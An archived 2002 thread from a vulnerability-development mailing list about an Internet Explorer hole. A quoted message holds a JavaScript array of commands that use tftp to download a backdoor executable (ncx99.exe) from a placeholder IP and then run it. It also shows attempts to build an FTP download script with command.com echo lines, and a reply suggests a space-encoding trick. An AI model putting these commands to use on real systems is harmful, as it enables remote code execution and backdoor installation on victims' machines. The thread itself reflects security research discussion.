Vulnerability Development mailing list archives

Re: Rather large MSIE-hole


From: KF <dotslash () snosoft com>
Date: Thu, 14 Mar 2002 16:56:50 -0500

Sorry if someone else has said this... but has anyone tried using + as a space like you had to when using cmd.exe via the Unicode exploit?
-KF


Felipe Franciosi wrote:

var programName=new Array(
    'c:/winnt/system32/tftp.exe -i xxx.xxx.xxx.xxx GET ncx99.exe',
    'c:/winnt/system32/ncx99.exe',
);


MS Windows 9x doesn't have a trivial ftp client by default... I was
thinking about how this could be exploitable on these versions...

The FTP client offers the option to read a text file containing
line-separated commands.

But I couldn't get something like this to work:
var prog...
     'c:/command.com /c echo bin > c:/list.txt',
     'c:/command.com /c echo GET something >> c:/list.txt'

This won't create 'list.txt'... Any ideas why? Or how someone could
get around it?

Regards,
Felipe

--
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Felipe Franciosi        paradoxo networking
felipe at paradoxo dot org
http://www.paradoxo.org   Porto Alegre - RS
Fone: (55)(51)9123-0557      UIN - 33596050
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=





